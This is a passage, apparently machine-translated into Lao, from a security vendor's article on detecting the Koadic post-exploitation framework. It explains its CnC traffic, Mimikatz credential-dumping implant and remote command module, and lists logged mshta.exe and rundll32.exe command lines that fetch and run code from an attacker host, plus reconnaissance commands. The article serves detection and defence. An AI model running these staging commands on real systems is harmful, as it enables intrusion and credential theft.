ອີງຕາມຕົວແປການຕອບສະຫນອງ WS, ມັນຈະກາຍເປັນທີ່ຊັດເຈນວ່າການປະຕິບັດເກີດຂື້ນຜ່ານ WScript.Shell, ແລະຕົວແປ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ມີຂໍ້ມູນທີ່ສໍາຄັນກ່ຽວກັບພາລາມິເຕີຂອງເຊດຊັນໃນປະຈຸບັນ. ນີ້ແມ່ນຄູ່ການຕອບສະຫນອງຄໍາຮ້ອງຂໍຄັ້ງທໍາອິດໃນການເຊື່ອມຕໍ່ HTTP ກັບເຄື່ອງແມ່ຂ່າຍ CnC. ການຮ້ອງຂໍຕໍ່ມາແມ່ນກ່ຽວຂ້ອງໂດຍກົງກັບການເຮັດວຽກຂອງໂມດູນທີ່ເອີ້ນວ່າ (implants). ໂມດູນ Koadic ທັງຫມົດເຮັດວຽກພຽງແຕ່ກັບກອງປະຊຸມທີ່ມີການເຄື່ອນໄຫວກັບ CnC.

ມິມີກີທາ

ຄືກັນກັບ CME ເຮັດວຽກກັບ Bloodhound, Koadic ເຮັດວຽກກັບ Mimikatz ເປັນໂຄງການແຍກຕ່າງຫາກແລະມີຫຼາຍວິທີທີ່ຈະເປີດຕົວມັນ. ຂ້າງລຸ່ມນີ້ແມ່ນຄູ່ຄໍາຮ້ອງຂໍການຕອບສະຫນອງສໍາລັບການດາວໂຫຼດ Mimikatz implant.

ເຂົ້າ. 12. ໂອນ Mimikatz ໄປ Koadic

ທ່ານສາມາດເບິ່ງວ່າຮູບແບບ URI ໃນຄໍາຮ້ອງຂໍມີການປ່ຽນແປງແນວໃດ. ໃນປັດຈຸບັນມັນມີຄ່າສໍາລັບຕົວແປ csrf, ເຊິ່ງຮັບຜິດຊອບສໍາລັບໂມດູນທີ່ເລືອກ. ຢ່າເອົາໃຈໃສ່ກັບຊື່ຂອງນາງ; ພວກເຮົາທຸກຄົນຮູ້ວ່າ CSRF ມັກຈະເຂົ້າໃຈແຕກຕ່າງກັນ. ການຕອບສະຫນອງແມ່ນຕົວຫຼັກດຽວກັນຂອງ Koadic, ເຊິ່ງລະຫັດທີ່ກ່ຽວຂ້ອງກັບ Mimikatz ໄດ້ຖືກເພີ່ມ. ມັນຂ້ອນຂ້າງໃຫຍ່, ດັ່ງນັ້ນໃຫ້ພວກເຮົາເບິ່ງຈຸດສໍາຄັນ. ໃນທີ່ນີ້ພວກເຮົາມີຫ້ອງສະຫມຸດ Mimikatz ທີ່ຖືກເຂົ້າລະຫັດໃນ base64, ຫ້ອງຮຽນ .NET serialized ທີ່ຈະໃສ່ມັນ, ແລະການໂຕ້ຖຽງທີ່ຈະເປີດຕົວ Mimikatz. ຜົນໄດ້ຮັບການປະຕິບັດໄດ້ຖືກສົ່ງຜ່ານເຄືອຂ່າຍໃນຂໍ້ຄວາມທີ່ຊັດເຈນ.

ເຂົ້າ. 13. ຜົນຂອງການແລ່ນ Mimikatz ໃນເຄື່ອງຫ່າງໄກສອກຫຼີກ

Exec_cmd

Koadic ຍັງມີໂມດູນທີ່ສາມາດປະຕິບັດຄໍາສັ່ງຈາກໄລຍະໄກ. ໃນທີ່ນີ້ພວກເຮົາຈະເຫັນວິທີການສ້າງ URI ດຽວກັນແລະຕົວແປ sid ແລະ csrf ທີ່ຄຸ້ນເຄີຍ. ໃນກໍລະນີຂອງໂມດູນ exec_cmd, ລະຫັດຖືກເພີ່ມເຂົ້າໄປໃນຮ່າງກາຍທີ່ສາມາດປະຕິບັດຄໍາສັ່ງຂອງແກະ. ຂ້າງລຸ່ມນີ້ແມ່ນສະແດງໃຫ້ເຫັນລະຫັດດັ່ງກ່າວທີ່ມີຢູ່ໃນການຕອບສະຫນອງ HTTP ຂອງເຄື່ອງແມ່ຂ່າຍ CnC.

ເຂົ້າ. 14. ລະຫັດ Implant exec_cmd

ຕົວແປ GAWTUUGCFI ທີ່ມີຄຸນລັກສະນະ WS ທີ່ຄຸ້ນເຄີຍແມ່ນຕ້ອງການສໍາລັບການປະຕິບັດລະຫັດ. ດ້ວຍການຊ່ວຍເຫຼືອຂອງມັນ, implant ເອີ້ນວ່າ shell, ການປຸງແຕ່ງສອງສາຂາຂອງລະຫັດ - shell.exec ກັບການກັບຄືນຂອງນ້ໍາຂໍ້ມູນຜົນຜະລິດແລະ shell.run ໂດຍບໍ່ມີການກັບຄືນ.

Koadic ບໍ່ແມ່ນເຄື່ອງມືທົ່ວໄປ, ແຕ່ມັນມີສິ່ງປະດິດຂອງຕົນເອງໂດຍທີ່ມັນສາມາດພົບເຫັນຢູ່ໃນການຈະລາຈອນທີ່ຖືກຕ້ອງ:

• ການສ້າງແບບພິເສດຂອງການຮ້ອງຂໍ HTTP,
• ໃຊ້ winHttpRequests API,
• ການສ້າງວັດຖຸ WScript.Shell ຜ່ານ ActiveXObject,
• ຮ່າງກາຍຂະຫນາດໃຫຍ່ທີ່ສາມາດປະຕິບັດໄດ້.

ການ​ເຊື່ອມ​ຕໍ່​ເບື້ອງ​ຕົ້ນ​ແມ່ນ​ໄດ້​ເລີ່ມ​ຕົ້ນ​ໂດຍ stager​, ສະ​ນັ້ນ​ມັນ​ເປັນ​ໄປ​ໄດ້​ທີ່​ຈະ​ກວດ​ພົບ​ກິດ​ຈະ​ກໍາ​ຂອງ​ຕົນ​ໂດຍ​ຜ່ານ​ເຫດ​ການ Windows​. ສໍາລັບ mshta, ນີ້ແມ່ນເຫດການ 4688, ເຊິ່ງຊີ້ໃຫ້ເຫັນການສ້າງຂະບວນການທີ່ມີຄຸນລັກສະນະເລີ່ມຕົ້ນ:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

ໃນຂະນະທີ່ Koadic ກໍາລັງແລ່ນ, ທ່ານສາມາດເບິ່ງເຫດການ 4688 ອື່ນໆທີ່ມີຄຸນລັກສະນະທີ່ມີລັກສະນະຢ່າງສົມບູນແບບ:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ການຄົ້ນພົບ

ທ່າ​ອ່ຽງ​ການ​ດຳ​ລົງ​ຊີ​ວິດ​ຢູ່​ນອກ​ດິນ​ພວມ​ໄດ້​ຮັບ​ຄວາມ​ນິ​ຍົມ​ຊົມ​ຊອບ​ໃນ​ບັນ​ດາ​ອາດ​ຍາ​ກອນ. ພວກເຂົາໃຊ້ເຄື່ອງມືແລະກົນໄກທີ່ສ້າງຂຶ້ນໃນ Windows ສໍາລັບຄວາມຕ້ອງການຂອງພວກເຂົາ. ພວກເຮົາກໍາລັງເຫັນເຄື່ອງມືທີ່ນິຍົມ Koadic, CrackMapExec ແລະ Impacket ປະຕິບັດຕາມຫຼັກການນີ້ເພີ່ມຂຶ້ນໃນບົດລາຍງານ APT. ຈໍານວນຂອງສ້ອມໃນ GitHub ສໍາລັບເຄື່ອງມືເຫຼົ່ານີ້ແມ່ນຍັງເພີ່ມຂຶ້ນ, ແລະອັນໃຫມ່ກໍາລັງປະກົດຂຶ້ນ (ມີແລ້ວປະມານຫນຶ່ງພັນຂອງເຂົາເຈົ້າໃນປັດຈຸບັນ). ທ່າອ່ຽງກຳລັງໄດ້ຮັບຄວາມນິຍົມອັນເນື່ອງມາຈາກຄວາມລຽບງ່າຍຂອງມັນ: ຜູ້ໂຈມຕີບໍ່ຕ້ອງການເຄື່ອງມືຂອງພາກສ່ວນທີສາມແລ້ວ; ພວກເຮົາສຸມໃສ່ການສຶກສາການສື່ສານເຄືອຂ່າຍ: ແຕ່ລະເຄື່ອງມືທີ່ອະທິບາຍຂ້າງເທິງນີ້ປ່ອຍໃຫ້ຮ່ອງຮອຍຂອງຕົນເອງໃນການຈະລາຈອນເຄືອຂ່າຍ; ການສຶກສາລາຍລະອຽດຂອງພວກເຂົາອະນຸຍາດໃຫ້ພວກເຮົາສອນຜະລິດຕະພັນຂອງພວກເຮົາ ການຄົ້ນພົບການໂຈມຕີເຄືອຂ່າຍ PT ກວດພົບພວກມັນ, ເຊິ່ງໃນທີ່ສຸດຈະຊ່ວຍສືບສວນລະບົບຕ່ອງໂສ້ທັງຫມົດຂອງເຫດການທາງອິນເຕີເນັດທີ່ກ່ຽວຂ້ອງກັບພວກເຂົາ.

ຜູ້ຂຽນ:

• Anton Tyurin, ຫົວຫນ້າພະແນກບໍລິການຜູ້ຊ່ຽວຊານ, PT Expert Security Center, ເຕັກໂນໂລຢີໃນທາງບວກ
• Egor Podmokov, ຜູ້ຊ່ຽວຊານ, ສູນຄວາມປອດໄພຜູ້ຊ່ຽວຊານ PT, ເຕັກໂນໂລຢີໃນທາງບວກ

ແຫຼ່ງຂໍ້ມູນ: www.habr.com